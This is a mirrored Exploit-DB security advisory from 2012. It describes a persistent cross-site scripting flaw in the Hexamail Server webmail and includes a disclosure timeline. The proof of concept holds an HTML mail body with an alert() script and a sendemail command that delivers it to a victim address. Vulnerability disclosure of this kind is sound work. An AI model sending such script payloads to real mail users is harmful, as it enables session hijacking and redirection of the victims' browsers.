bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/webapps/18982.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

59 lines
No EOL
1.9 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#Title: Hexamail Server <= 4.4.5 Persistent XSS Vulnerability
#Date: June 3, 2012
#Author: modpr0be[at]Spentera, @modpr0be
#URL: http://www.spentera.com
#Software URL:http://www.hexamail.com/download/hexamailserversetup4.4.5.002.exe
#Tested on
# OS: Windows XP SP3, Windows 2003 SP2, Windows 7 SP1
# Browser: Chrome 19.0.x, IE9, Safari 5.1.7
Software Description
====================
Hexamail provides intelligent email software solutions. Leveraging the latest
advanced techniques, such as Bayesian matching, our products enable customers
to eliminate email intrusions such as spam, malware, spyware, phishing attacks
and virus.
Vulnerability Description
=========================
Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing
malicious user to execute scripts in a victims browser to hijack user sessions,
redirect users, and or hijack the users browser.
Proof of concept
================
By sending a malicious script to the victim email, the webmail automatically
load the mail body, so the script will be automatically executed without permission
from user.
root@bt:~/# cat > meal.txt
<html>
<body>
<h1>XSS pop up</h1>
<script>alert('Hi, what is this?');</script>
</body>
</html>
root@bt:~/#
Send email to the victim:
root@bt:~/# sendemail -f bob@example.com -t david@example.com -xu bob@example.com \
-xp bob123 -u "Want some meal..?" -o message-file=meal.txt -s mail.example.com
Vendor timeline
===============
04/20/2012 - Issue discovered
04/20/2012 - Vendor contacted
04/27/2012 - Vendor respond and provides new upgrade version
04/30/2012 - Issue still affected on the latest upgrade version
04/30/2012 - Vendor said they still fixing the problem
05/10/2012 - Email sent to ask about the fix progress
06/02/2012 - No response. Advisory published.
Solution
============
Not available.
References
============
http://www.hexamail.com
http://www.spentera.com/2012/06/hexamail-server-4-4-5-persistent-xss-vulnerability/
Reference in a new issue View git blame Copy permalink